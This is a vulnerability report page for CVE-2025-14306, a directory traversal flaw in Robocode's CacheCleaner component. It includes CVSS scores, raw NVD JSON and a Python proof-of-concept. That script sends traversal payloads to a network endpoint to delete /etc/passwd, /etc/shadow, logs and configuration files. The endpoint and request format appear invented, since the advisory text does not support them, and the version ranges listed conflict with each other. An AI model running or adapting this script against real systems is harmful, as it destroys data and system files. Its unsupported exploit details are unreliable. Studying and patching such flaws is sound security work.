Security Vulnerability Report
中文
CVE-2025-14306 CVSS 9.1 CRITICAL

CVE-2025-14306

Published: 2025-12-09 16:17:38
Last Modified: 2026-01-28 20:16:08
Source: [email protected]

Description

A directory traversal vulnerability exists in the CacheCleaner component of Robocode version 1.9.3.6. The recursivelyDelete method fails to properly sanitize file paths, allowing attackers to traverse directories and delete arbitrary files on the system. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the file path, leading to potential unauthorized file deletions. https://robo-code.blogspot.com/

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:robocode:robocode:1.9.3.6:*:*:*:*:*:*:* - VULNERABLE
Robocode < 1.9.3.6 (CacheCleaner组件所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import urllib.parse # CVE-2025-14306 PoC - Directory Traversal in Robocode CacheCleaner # Target: Robocode 1.9.3.6 CacheCleaner Component TARGET_URL = "http://target:8080/cacheclean" def exploit_directory_traversal(): """ Exploit the directory traversal vulnerability in CacheCleaner recursivelyDelete method. This PoC demonstrates how to delete arbitrary files outside the cache directory. """ # Payload to delete /etc/passwd using path traversal # The ../ sequences will traverse up from the cache directory to system root malicious_path = "../../../../../../etc/passwd" # Alternative payloads for different targets payloads = [ "../../../../../../etc/passwd", # Delete system passwd file "../../../../../../var/log/app.log", # Delete application logs "../../../config/database.yml", # Delete configuration files "../../../../../../etc/shadow", # Attempt to delete shadow file ] for payload in payloads: try: # Send malicious request to CacheCleaner endpoint response = requests.post( TARGET_URL, data={'path': payload}, timeout=10 ) print(f"[*] Sent payload: {payload}") print(f"[*] Response status: {response.status_code}") if response.status_code == 200: print(f"[!] File deletion request sent successfully") print(f"[!] Target file may have been deleted") else: print(f"[*] Request failed or blocked") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": print("CVE-2025-14306 - Robocode CacheCleaner Directory Traversal PoC") print("=" * 60) exploit_directory_traversal()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14306", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:38.477", "lastModified": "2026-01-28T20:16:08.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A directory traversal vulnerability exists in the CacheCleaner component of Robocode version 1.9.3.6. The recursivelyDelete method fails to properly sanitize file paths, allowing attackers to traverse directories and delete arbitrary files on the system. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the file path, leading to potential unauthorized file deletions. https://robo-code.blogspot.com/"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:D/RE:M/U:Red", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:robocode:robocode:1.9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "838ABFF5-2DF6-4A7E-933B-179FB2FC1AE0"}]}]}], "references": [{"url": "https://github.com/robo-code/robocode/pull/67", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/robo-code/robocode/commit/26b6ba8ed5b2a11a646ce2d5da8d42cd53574b1f", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.